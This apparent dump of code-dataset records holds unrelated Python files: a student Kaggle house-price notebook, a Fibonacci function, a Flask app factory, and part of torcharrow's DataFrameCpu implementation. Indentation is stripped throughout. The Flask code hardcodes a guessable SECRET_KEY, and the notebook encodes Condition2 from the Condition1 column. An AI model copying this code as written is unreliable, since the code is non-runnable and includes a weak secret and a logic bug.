X = house_score_exterqual_ordinal_neighbors[['OverallQual', 'YearBuilt' , 'GrLivArea', 'GarageArea','ExterQual','KitchenQual', 'Neighborhood']]
y = house_score_exterqual_ordinal_neighbors[['logSalePrice']]
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.01,random_state=0)
regr = linear_model.LinearRegression()
regr.fit(X_train, y_train)
y_pred = regr.predict(X_test)
accuracy = regr.score(X_test, y_test)
#print(accuracy)
# Prints the r2 score for the linear regression model
print(r2_score(y_test, y_pred))
test_file = pd.read_csv('C:/Fall2019/DSF/Assignment2/Data/test.csv')
test_file_variables = test_file[['OverallQual', 'YearBuilt' , 'GrLivArea', 'GarageArea','ExterQual','KitchenQual','Neighborhood']]
mapper = {'Ex':5, 'Gd':4, 'TA':3, 'Fa':2, 'Po':1}
test_file_variables_ordinal = test_file_variables.replace(mapper)
test_file_variables_ordinal_neighbor = test_file_variables_ordinal.replace(neighbor_mapper)
test_file_variables_ordinal_neighbor.fillna(0, inplace=True)
test_file_predict = regr.predict(test_file_variables_ordinal_neighbor)
sampleSubmission = pd.read_csv("C:/Fall2019/DSF/Assignment2/Data/sample_submission.csv")
sampleSubmission['SalePrice'] = np.exp(test_file_predict)
sampleSubmission.to_csv("C:/Fall2019/DSF/Assignment2/Data/sampleSubmission1.csv")
sampleSubmission.shape
# In[439]:
# Converting the categorical nominal variable 'Neighborhood' to ordinal variable according to the mean of the SalePrice
neighborhood = train_houses[['Neighborhood','SalePrice']]
neighborGroupBy = neighborhood.groupby(by='Neighborhood').mean()
#print(neighborGroupBy)
neighborGroupBy.sort_values(by='SalePrice')
neighbor_mapper = {'MeadowV':1,
'IDOTRR':2,
'BrDale':3,
'BrkSide':4,
'Edwards':5,
'OldTown':6,
'Sawyer':7,
'Blueste':8,
'SWISU':9,
'NPkVill':10,
'NAmes':11,
'Mitchel':12,
'SawyerW':13,
'NWAmes':14,
'Gilbert':15,
'Blmngtn':16,
'CollgCr':17,
'Crawfor':18,
'ClearCr':19,
'Somerst':20,
'Veenker':21,
'Timber':22,
'StoneBr':23,
'NridgHt':24,
'NoRidge':25}
house_score_exterqual_ordinal['Neighborhood'] = train_houses[['Neighborhood']]
house_score_exterqual_ordinal_neighbors = house_score_exterqual_ordinal.replace(neighbor_mapper)
display(house_score_exterqual_ordinal_neighbors.head())
# How well/badly does it work? Which are the most important variables?
#
# So, I experimented with many variables. Mostly numerical variables which has a significant correlation with the SalePrice.
# In the end, I got to know the significance of the neighborhood with the SalePrice as this is true in most parts of the world. For example, prices of houses in Manhattan will definitely be higher than that of houses in Stony Brook!
# So, I included neighborhood in the linear regression model for prediction.
# ## Part 7 - External Dataset
# In[598]:
# code to import external dataset and test
ownership_rate = pd.read_csv('C:/Fall2019/DSF/Assignment2/Data/IAHOWN.csv')
ownership_rate['DATE'] = pd.to_datetime(ownership_rate['DATE'])
ownership_rate['DATE'] = ownership_rate['DATE'].dt.year
display(ownership_rate.head())
house_with_yr_sold = house_score_exterqual_ordinal_neighbors
house_with_yr_sold['YrSold'] = train_houses['YrSold']
merged = pd.merge(house_with_yr_sold, ownership_rate, left_on = 'YrSold', right_on = 'DATE')
display(merged.head())
X_merged = merged[['OverallQual', 'YearBuilt' , 'GrLivArea', 'GarageArea','ExterQual','KitchenQual', 'Neighborhood', 'IAHOWN']]
y_merged = merged[['logSalePrice']]
X_merged_train,X_merged_test,y_merged_train,y_merged_test=train_test_split(X_merged,y_merged,test_size=0.01,random_state=0)
regr_merged = linear_model.LinearRegression()
regr_merged.fit(X_merged_train, y_merged_train)
y_pred_merged = regr_merged.predict(X_merged_test)
#print(accuracy)
# Prints the r2 score for the linear regression model
print("Accuracy after merging the external data: ")
print(r2_score(y_merged_test, y_pred_merged))
print('')
print("Accuracy before merging the external data: ")
print('0.92675')
# Describe the dataset and whether this data helps with prediction.
#
# There is a dataset of Homeownership Rate for the state of Iowa, which I found on FRED Economic Data website (https://fred.stlouisfed.org)
#
# This dataset talks about the rate of ownership of the houses inthe state of Iowa for a particular year starting from the year of 1984 up until 2018.
#
# I integrated this dataset in my train data to check whether the ownership rate of the houses affected the sale price or not.
# Ideally, the homeownership rate should affect the SalePrice of the house as more the ownership rate of the year, more the people are buying the houses and more the demand and SalePrice should increase proportionally.
#
# In the external dataset, first I extracted the year from the date provided.
# Then, I merged the two tables based on year provided in the external dataset and the year the house was sold in the original data which makes sense because we would check the home ownership rate only while buying the house.
#
# As we can see from the code above that the accuracy of the simple linear regression model decreases from approx. 0.92 to 0.86 after we merge the external data with the original data, we would not be using it for further prediction as this will only become a hindrance for us in predicting good values.
#
# So, this data clearly does not help with the prediction.
# ## Part 8 - Permutation Test
# In[583]:
# Create a redundant data frame for doing permutation tests and add all the permutation columns in it
permutation_df = house_score_exterqual_ordinal_neighbors
# Meaningless variables to be included for permutation tests = LandContour, LotConfig, LandSlope, Condition1, Condition2
permutation_df['LandContour'] = train_houses['LandContour']
permutation_df['LotConfig'] = train_houses['LotConfig']
permutation_df['LandSlope'] = train_houses['LandSlope']
permutation_df['Condition1'] = train_houses['Condition1']
permutation_df['Condition2'] = train_houses['Condition2']
permutation_df.fillna(0,inplace=True)
le_LandContour = preprocessing.LabelEncoder()
le_LotConfig = preprocessing.LabelEncoder()
le_LandSlope = preprocessing.LabelEncoder()
le_Condition1 = preprocessing.LabelEncoder()
le_Condition2 = preprocessing.LabelEncoder()
permutation_df['LotConfig'] = le_LotConfig.fit_transform(permutation_df['LotConfig'])
permutation_df['LandContour'] = le_LandContour.fit_transform(permutation_df['LandContour'])
permutation_df['LandSlope'] = le_LandSlope.fit_transform(permutation_df['LandSlope'])
permutation_df['Condition1'] = le_Condition1.fit_transform(permutation_df['Condition1'])
permutation_df['Condition2'] = le_Condition2.fit_transform(permutation_df['Condition1'])
# In[532]:
# TODO: code for all permutation tests
# Variables selected for p test:
# Meaningful
# 'OverallQual',
# 'GrLivArea',
# 'GarageArea',
# 'ExterQual',
# 'KitchenQual',
# Meaningless
# 'LandContour',
# 'LotConfig',
# 'LandSlope',
# 'Condition1',
# 'Condition2'
# A simple function to return random permutation of the data
def permute(df):
df = df.copy()
df.apply(np.random.shuffle)
return df
permutation_columns = ['OverallQual', 'GrLivArea', 'GarageArea', 'ExterQual', 'KitchenQual','LandContour', 'LotConfig', 'LandSlope', 'Condition1', 'Condition2']
X_whole = house_score_exterqual_ordinal_neighbors[['OverallQual','GrLivArea', 'GarageArea','ExterQual','KitchenQual','LandContour', 'LotConfig', 'LandSlope', 'Condition1', 'Condition2']]
y_whole = house_score_exterqual_ordinal_neighbors[['logSalePrice']]
# iterate through all the columns selected for permutation testing
# Prepare the training data for that single column only by taking 100 random permutations
# Perform simple linear regression for that column
# Calculate the Root of Mean Square Error (RMSE)
# Append the 100 values of RMSE in a list
for col in permutation_columns:
rmse_perm = []
print("Column: ", col)
for _ in range(100):
X_perm = permute(X_whole[[col]])
y_perm = permute(y_whole)
X_train_perm,X_test_perm,y_train_perm,y_test_perm=train_test_split(X_perm,y_perm,test_size=0.25,random_state=0)
regr_perm = linear_model.LinearRegression()
regr_perm.fit(X_train_perm, y_train_perm)
y_pred_perm = regr_perm.predict(X_test_perm)
rms = np.sqrt(mean_squared_error(y_test_perm, y_pred_perm))
rmse_perm.append(rms)
# Train the model with the real values of the data
X_train_real,X_test_real,y_train_real,y_test_real = train_test_split(X_whole[[col]],y_whole,test_size=0.01,random_state=0)
# with sklearn
regr_real = linear_model.LinearRegression()
regr_real.fit(X_train_real, y_train_real)
y_pred_real = regr_real.predict(X_test_real)
rms_real = np.sqrt(mean_squared_error(y_test_real, y_pred_real))
# append the real result to the rmse list
rmse_perm.append(rms_real)
# Plot the graphs for 10 different columns RMSEs and highlight the RMSE of the real data
n, bins, patches = plt.hist(rmse_perm, 20, density=True, facecolor='g', alpha=0.75, edgecolor='black')
ylim = plt.ylim()
plt.plot(2 * [rmse_perm[100]], ylim, '--g', linewidth=3,
label='Real Score')
plt.ylim(ylim)
plt.legend()
plt.xlabel('Score')
plt.xlabel('RMSE')
plt.ylabel('Frequency')
plt.title('RMSEs of permutation test')
plt.grid(True)
plt.show()
# Get the pvalue from the permutation scores
rmse_perm.sort()
pos = rmse_perm.index(rms_real)
pvalue = pos/101
print("PValue with column :", col)
pvalue = round(pvalue, 3)
print(pvalue)
# Added to print new lines between plots
print('')
print('')
print('')
# Permutation test results description
#
#
#
# The first 3 meaningful variables such as OverallQual, GarageArea , GrLivArea have very low pvalues almost equal to 0.00 which means that they are highly correlated to the SalePrice and hence it is statistically significant
#
# The next 2 variables ie KitchenQual and ExterQual, which we considered to be quite meaningful ended up have a pvalue of 0.505 and 0.347 which means that they may not be as astatistically significant as we thought them to be.
#
# The meaningless variables have very high pvalues of 0.99 which means that our intuition was right and those variables are actually statistically insignificant and meaningless with respect to the prediction of the SalePrice.
# Describe the results.
# XGBoost Model
# In[ ]:
# XGBoost Model
model = XGBRegressor(n_estimators = 1000, #100-1000
learning_rate = 0.01, #increase while decreasing n_trees
max_depth = 5, #increase incrementally by 1; default 6, increasing can lead to overfit
colsample_bytree = 0.3, # 0.3 to 0.8
gamma = 0) #0, 1 or 5
model.fit(X_train, y_train)
xgb_preds = model.predict(X_test) #store the predictions for xgbregressor
rmse = np.sqrt(mean_squared_error(y_test, xgb_preds))
print(rmse)
test_file_predict2 = model.predict(test_file_variables_ordinal_neighbor)
sampleSubmission2 = pd.read_csv("C:/Fall2019/DSF/Assignment2/Data/sample_submission.csv")
sampleSubmission2['SalePrice'] = np.exp(test_file_predict2)
sampleSubmission2.to_csv("C:/Fall2019/DSF/Assignment2/Data/sampleSubmission2.csv")
sampleSubmission2.shape
print(len(xgb_preds))
# Kernel Ridge Regression Model
# In[ ]:
# Kernel Ridge Regression:
clf = KernelRidge(alpha=1.0)
clf.fit(X_train, y_train)
test_file_predict3 = clf.predict(test_file_variables_ordinal_neighbor)
sampleSubmission3 = pd.read_csv("C:/Fall2019/DSF/Assignment2/Data/sample_submission.csv")
sampleSubmission3['SalePrice'] = np.exp(test_file_predict3)
sampleSubmission3.to_csv("C:/Fall2019/DSF/Assignment2/Data/sampleSubmission3.csv")
sampleSubmission3.shape
print(len(test_file_predict3))
# Lasso Regression
# In[ ]:
# Lasso Regression
clf2 = linear_model.Lasso(alpha=0.1)
clf2.fit(X_train, y_train)
test_file_predict4 = clf2.predict(test_file_variables_ordinal_neighbor)
sampleSubmission4 = pd.read_csv("C:/Fall2019/DSF/Assignment2/Data/sample_submission.csv")
sampleSubmission4['SalePrice'] = np.exp(test_file_predict4)
sampleSubmission4.to_csv("C:/Fall2019/DSF/Assignment2/Data/sampleSubmission4.csv")
# Comparison of Different Models
#
# 1) Linear Regression Model: (done in 6th question)
#
# This model did not perform very well as expected. Linear Regression model just finds the linear relationship between the independent variables and the dependent variable. When I uploaded the results to Kaggle, I was getting a score of 0.1924
#
# 2) XGBoost Model:
#
# This model improved the model significantly and gave the Kaggle score of 0.1349 and a rank of 2234. This was the best performing model out of all the four models.
#
# 3) Kernel Ridge Regression:
#
# This model did not give much accuracy as compared to other models. It gave Kaggle score of 0.3675.
#
# 4) Lasso Regression:
#
# This model performed on the same lines as that of baseline Linear Regression and gave the accuracy of around 0.2138
#
# Hence, XGBoost gives the best result for the prediction of the test task.
#
# ## Part 9 - Final Result
# Report the rank, score, number of entries, for your highest rank. Include a snapshot of your best score on the leaderboard as confirmation. Be sure to provide a link to your Kaggle profile. Make sure to include a screenshot of your ranking. Make sure your profile includes your face and affiliation with SBU.
# Kaggle Link: https://www.kaggle.com/rutvikparekh
# Highest Rank: 2234
# Score: 0.13495
# Number of entries: 10
# The screenshot of my ranking is uploaded on Google Drive.
#
# https://drive.google.com/file/d/1Yqk5MNLMGGpiv13kAPbWUPgAyGLjYzNB/view?usp=sharing
|
986,921 | faebb708ca7059ffdcb57938b2ef45fc4bdb7662 |
def fibo(n):
pre = 0
cur = 1
if n < 2:
return n
else:
for i in range(2, n+1):
pre, cur = cur, pre + cur
return cur
n = int(input())
print(fibo(n))
|
986,922 | 207116f6cd08a7262fd4e90cb99bbaff5aa50dba | #!/usr/bin/python3
#coding:utf-8
"""
主程序文件
"""
from flask import Flask
def create_app():
app = Flask(__name__)
app.config['SECRET_KEY'] = 'hello-world-2016'
from controller.home import home as home_blueprint
from controller.ghdn.home import ghdn as ghdn_blueprint
from controller.ghdn.drug import drug as drug_blueprint
from controller.ghdn.network import network as network_blueprint
from controller.ghdn.gene import gene as gene_blueprint
from controller.backstage.login import login as login_blueprint
app.register_blueprint(home_blueprint, url_prefix='/home')
app.register_blueprint(ghdn_blueprint, url_prefix='/ghdn')
app.register_blueprint(drug_blueprint, url_prefix='/drug')
app.register_blueprint(network_blueprint, url_prefix='/network')
app.register_blueprint(gene_blueprint, url_prefix='/gene')
app.register_blueprint(login_blueprint, url_prefix='/login')
return app
|
986,923 | ec63bf9d7db9caafa0e1c3ebc82a2487e762731a | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
from __future__ import annotations
import array as ar
import functools
from abc import abstractmethod
from dataclasses import dataclass
from typing import (
Any,
Callable,
Dict,
Iterable,
List,
Literal,
Mapping,
Optional,
Sequence,
Tuple,
Union,
cast,
Iterable,
Iterator,
OrderedDict,
)
import numpy as np
import torcharrow as ta
import torcharrow._torcharrow as velox
import torcharrow.dtypes as dt
import torcharrow.pytorch as pytorch
from tabulate import tabulate
from torcharrow.dispatcher import Dispatcher
from torcharrow.expression import eval_expression, expression
from torcharrow.icolumn import IColumn
from torcharrow.idataframe import IDataFrame
from torcharrow.scope import Scope
from torcharrow.trace import trace, traceproperty
from .column import ColumnFromVelox
from .typing import get_velox_type
# assumes that these have been imported already:
# from .inumerical_column import INumericalColumn
# from .istring_column import IStringColumn
# from .imap_column import IMapColumn
# from .ilist_column import IListColumn
# ------------------------------------------------------------------------------
# DataFrame Factory with default scope and device
# -----------------------------------------------------------------------------
# DataFrames aka (StructColumns, can be nested as StructColumns:-)
DataOrDTypeOrNone = Union[Mapping, Sequence, dt.DType, Literal[None]]
class DataFrameCpu(ColumnFromVelox, IDataFrame):
"""Dataframe, ordered dict of typed columns of the same length"""
def __init__(self, device, dtype, data):
assert dt.is_struct(dtype)
IDataFrame.__init__(self, device, dtype)
self._data = velox.Column(get_velox_type(dtype))
assert isinstance(data, dict)
first = True
for key, value in data.items():
assert isinstance(value, ColumnFromVelox)
assert first or len(value) == len(self._data)
first = False
# TODO: using a dict for field type lookup
(field_dtype,) = (f.dtype for f in self.dtype.fields if f.name == key)
col = value
idx = self._data.type().get_child_idx(key)
self._data.set_child(idx, col._data)
self._data.set_length(len(col))
self._finialized = False
@property
def _mask(self) -> List[bool]:
return [self._getmask(i) for i in range(len(self))]
# Any _full requires no further type changes..
@staticmethod
def _full(device, data: Dict[str, ColumnFromVelox], dtype=None, mask=None):
assert mask is None # TODO: remove mask parameter in _FullColumn
cols = data.values() # TODO: also allow data to be a single Velox RowColumn
assert all(isinstance(c, ColumnFromVelox) for c in data.values())
ct = 0
if len(data) > 0:
ct = len(list(cols)[0])
if not all(len(c) == ct for c in cols):
ValueError(f"length of all columns must be the same (e.g {ct})")
inferred_dtype = dt.Struct([dt.Field(n, c.dtype) for n, c in data.items()])
if dtype is None:
dtype = inferred_dtype
else:
# TODO this must be weakened (to deal with nulls, etc)...
if dtype != inferred_dtype:
pass
# raise TypeError(f'type of data {inferred_dtype} and given type {dtype} must be the same')
return DataFrameCpu(device, dtype, data)
# Any _empty must be followed by a _finalize; no other ops are allowed during this time
@staticmethod
def _empty(device, dtype):
field_data = {f.name: Scope._EmptyColumn(f.dtype, device) for f in dtype.fields}
return DataFrameCpu(device, dtype, field_data)
@staticmethod
def _fromlist(device, data: List, dtype):
# default (ineffincient) implementation
col = DataFrameCpu._empty(device, dtype)
for i in data:
col._append(i)
return col._finalize()
def _append_null(self):
if self._finialized:
raise AttributeError("It is already finialized.")
df = self.append([None])
self._data = df._data
def _append_value(self, value):
if self._finialized:
raise AttributeError("It is already finialized.")
df = self.append([value])
self._data = df._data
def _finalize(self):
self._finialized = True
return self
def _fromdata(
self, field_data: OrderedDict[str, IColumn], mask: Optional[Iterable[bool]]
):
dtype = dt.Struct(
[dt.Field(n, c.dtype) for n, c in field_data.items()],
nullable=self.dtype.nullable,
)
col = velox.Column(get_velox_type(dtype))
for n, c in field_data.items():
col.set_child(col.type().get_child_idx(n), c._data)
col.set_length(len(c._data))
if mask is not None:
mask_list = list(mask)
assert len(field_data) == 0 or len(mask_list) == len(col)
for i in range(len(col)):
if mask_list[i]:
col.set_null_at(i)
return ColumnFromVelox.from_velox(self.device, dtype, col, True)
def __len__(self):
return len(self._data)
@property
def null_count(self):
return self._data.get_null_count()
def _getmask(self, i):
if i < 0:
i += len(self._data)
return self._data.is_null_at(i)
def _getdata(self, i):
if i < 0:
i += len(self._data)
if not self._getmask(i):
return tuple(
ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[j].dtype,
self._data.child_at(j),
True,
)._get(i, None)
for j in range(self._data.children_size())
)
else:
return None
@staticmethod
def _valid_mask(ct):
return np.full((ct,), False, dtype=np.bool8)
def append(self, values: Iterable[Union[None, dict, tuple]]):
"""Returns column/dataframe with values appended."""
it = iter(values)
try:
value = next(it)
if value is None:
if not self.dtype.nullable:
raise TypeError(
f"a tuple of type {self.dtype} is required, got None"
)
else:
df = self.append([{f.name: None for f in self.dtype.fields}])
df._data.set_null_at(len(df) - 1)
return df
elif isinstance(value, dict):
assert self._data.children_size() == len(value)
res = {}
for k, v in value.items():
idx = self._data.type().get_child_idx(k)
child = self._data.child_at(idx)
dtype = self.dtype.fields[idx].dtype
child_col = ColumnFromVelox.from_velox(
self.device, dtype, child, True
)
child_col = child_col.append([v])
res[k] = child_col
new_data = self._fromdata(res, self._mask + [False])
return new_data.append(it)
elif isinstance(value, tuple):
assert self._data.children_size() == len(value)
return self.append(
[{f.name: v for f, v in zip(self.dtype.fields, value)}]
).append(it)
except StopIteration:
return self
def _check_columns(self, columns: Iterable[str]):
valid_names = {f.name for f in self.dtype.fields}
for n in columns:
if n not in valid_names:
raise TypeError(f"column {n} not among existing dataframe columns")
# implementing abstract methods ----------------------------------------------
def _set_field_data(self, name: str, col: IColumn, empty_df: bool):
if not empty_df and len(col) != len(self):
raise TypeError("all columns/lists must have equal length")
column_idx = self._dtype.get_index(name)
new_delegate = velox.Column(get_velox_type(self._dtype))
new_delegate.set_length(len(col._data))
# Set columns for new_delegate
for idx in range(len(self._dtype.fields)):
if idx != column_idx:
new_delegate.set_child(idx, self._data.child_at(idx))
else:
new_delegate.set_child(idx, col._data)
self._data = new_delegate
# printing ----------------------------------------------------------------
def __str__(self):
return self.__repr__()
def __repr__(self):
data = []
for i in self:
if i is None:
data.append(["None"] * len(self.columns))
else:
assert len(i) == len(self.columns)
data.append(list(i))
tab = tabulate(
data, headers=["index"] + self.columns, tablefmt="simple", showindex=True
)
typ = f"dtype: {self._dtype}, count: {len(self)}, null_count: {self.null_count}"
return tab + dt.NL + typ
# selectors -----------------------------------------------------------
def _column_index(self, arg):
return self._data.type().get_child_idx(arg)
def _gets(self, indices):
return self._fromdata(
{n: c[indices] for n, c in self._field_data.items()}, self._mask[indices]
)
def _slice(self, start, stop, step):
mask = [self._mask[i] for i in list(range(len(self)))[start:stop:step]]
return self._fromdata(
{
self.dtype.fields[i]
.name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
._slice(start, stop, step)
for i in range(self._data.children_size())
},
mask,
)
def get_column(self, column):
idx = self._data.type().get_child_idx(column)
return ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[idx].dtype,
self._data.child_at(idx),
True,
)
def get_columns(self, columns):
# TODO: decide on nulls, here we assume all defined (mask = False) for new parent...
res = {}
for n in columns:
res[n] = self.get_column(n)
return self._fromdata(res, self._mask)
def slice_columns(self, start, stop):
# TODO: decide on nulls, here we assume all defined (mask = False) for new parent...
_start = 0 if start is None else self._column_index(start)
_stop = len(self.columns) if stop is None else self._column_index(stop)
res = {}
for i in range(_start, _stop):
m = self.columns[i]
res[m] = ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
return self._fromdata(res, self._mask)
# functools map/filter/reduce ---------------------------------------------
@trace
@expression
def map(
self,
arg: Union[Dict, Callable],
/,
na_action: Literal["ignore", None] = None,
dtype: Optional[dt.DType] = None,
columns: Optional[List[str]] = None,
):
"""
Maps rows according to input correspondence.
dtype required if result type != item type.
"""
if columns is None:
return super().map(arg, na_action, dtype)
self._check_columns(columns)
if len(columns) == 1:
idx = self._data.type().get_child_idx(columns[0])
return ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[idx].dtype,
self._data.child_at(idx),
True,
).map(arg, na_action, dtype)
else:
if not isinstance(arg, dict) and dtype is None:
(dtype, _) = dt.infer_dype_from_callable_hint(arg)
dtype = dtype or self._dtype
def func(*x):
return arg.get(tuple(*x), None) if isinstance(arg, dict) else arg(*x)
cols = []
for n in columns:
idx = self._data.type().get_child_idx(n)
cols.append(
ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[idx].dtype,
self._data.child_at(idx),
True,
)
)
res = Scope.default._EmptyColumn(dtype)
for i in range(len(self)):
if self.is_valid_at(i):
res._append(func(*[col[i] for col in cols]))
elif na_action is None:
res._append(func(None))
else:
res._append(None)
return res._finalize()
@trace
@expression
def flatmap(
self,
arg: Union[Dict, Callable],
na_action: Literal["ignore", None] = None,
dtype: Optional[dt.DType] = None,
columns: Optional[List[str]] = None,
):
"""
Maps rows to list of rows according to input correspondence
dtype required if result type != item type.
"""
if columns is None:
return super().flatmap(arg, na_action, dtype)
self._check_columns(columns)
if len(columns) == 1:
return self._field_data[columns[0]].flatmap(
arg,
na_action,
dtype,
)
else:
def func(x):
return arg.get(x, None) if isinstance(arg, dict) else arg(x)
dtype_ = dtype if dtype is not None else self._dtype
cols = [self._field_data[n] for n in columns]
res = Scope._EmptyColumn(dtype_)
for i in range(len(self)):
if self.valid(i):
res._extend(func(*[col[i] for col in cols]))
elif na_action is None:
res._extend(func(None))
else:
res._append([])
return res._finalize()
@trace
@expression
def filter(
self, predicate: Union[Callable, Iterable], columns: Optional[List[str]] = None
):
"""
Select rows where predicate is True.
Different from Pandas. Use keep for Pandas filter.
Parameters
----------
predicate - callable or iterable
A predicate function or iterable of booleans the same
length as the column. If an n-ary predicate, use the
columns parameter to provide arguments.
columns - list of string names, default None
Which columns to invoke the filter with. If None, apply to
all columns.
See Also
--------
map, reduce, flatmap
Examples
--------
>>> ta.Column([1,2,3,4]).filter([True, False, True, False]) == ta.Column([1,2,3,4]).filter(lambda x: x%2==1)
0 1
1 1
dtype: boolean, length: 2, null_count: 0
"""
if columns is None:
return super().filter(predicate)
self._check_columns(columns)
if not isinstance(predicate, Iterable) and not callable(predicate):
raise TypeError(
"predicate must be a unary boolean predicate or iterable of booleans"
)
res = Scope._EmptyColumn(self._dtype)
cols = []
for n in columns:
idx = self._data.type().get_child_idx(n)
cols.append(
ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[idx].dtype,
self._data.child_at(idx),
True,
)
)
if callable(predicate):
for i in range(len(self)):
if predicate(*[col[i] for col in cols]):
res._append(self[i])
elif isinstance(predicate, Iterable):
for x, p in zip(self, predicate):
if p:
res._append(x)
else:
pass
return res._finalize()
# sorting ----------------------------------------------------------------
@trace
@expression
def sort(
self,
by: Optional[List[str]] = None,
ascending=True,
na_position: Literal["last", "first"] = "last",
):
"""Sort a column/a dataframe in ascending or descending order"""
# Not allowing None in comparison might be too harsh...
# Move all rows with None that in sort index to back...
func = None
if isinstance(by, list):
xs = []
for i in by:
_ = self._data.type().get_child_idx(i) # throws key error
xs.append(self.columns.index(i))
reorder = xs + [j for j in range(len(self.dtype.fields)) if j not in xs]
def func(tup):
return tuple(tup[i] for i in reorder)
res = Scope._EmptyColumn(self.dtype)
if na_position == "first":
res._extend([None] * self.null_count)
res._extend(
sorted((i for i in self if i is not None), reverse=not ascending, key=func)
)
if na_position == "last":
res._extend([None] * self.null_count)
return res._finalize()
@trace
@expression
def _nlargest(
self,
n=5,
columns: Optional[List[str]] = None,
keep: Literal["last", "first"] = "first",
):
"""Returns a new dataframe of the *n* largest elements."""
# Todo add keep arg
return self.sort(by=columns, ascending=False).head(n)
@trace
@expression
def _nsmallest(
self,
n=5,
columns: Optional[List[str]] = None,
keep: Literal["last", "first"] = "first",
):
"""Returns a new dataframe of the *n* smallest elements."""
return self.sort(by=columns, ascending=True).head(n)
# operators --------------------------------------------------------------
@expression
def __add__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
+ ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
+ other
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __radd__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: other[n] + c for (n, c) in self._field_data.items()}
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: other
+ ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __sub__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
- ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
- other
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __rsub__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
- ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: other
- ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __mul__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
* ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
* other
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __rmul__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
* ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: other
* ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __floordiv__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
// ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
// other
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __rfloordiv__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
// ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: other
// ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __truediv__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
/ ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
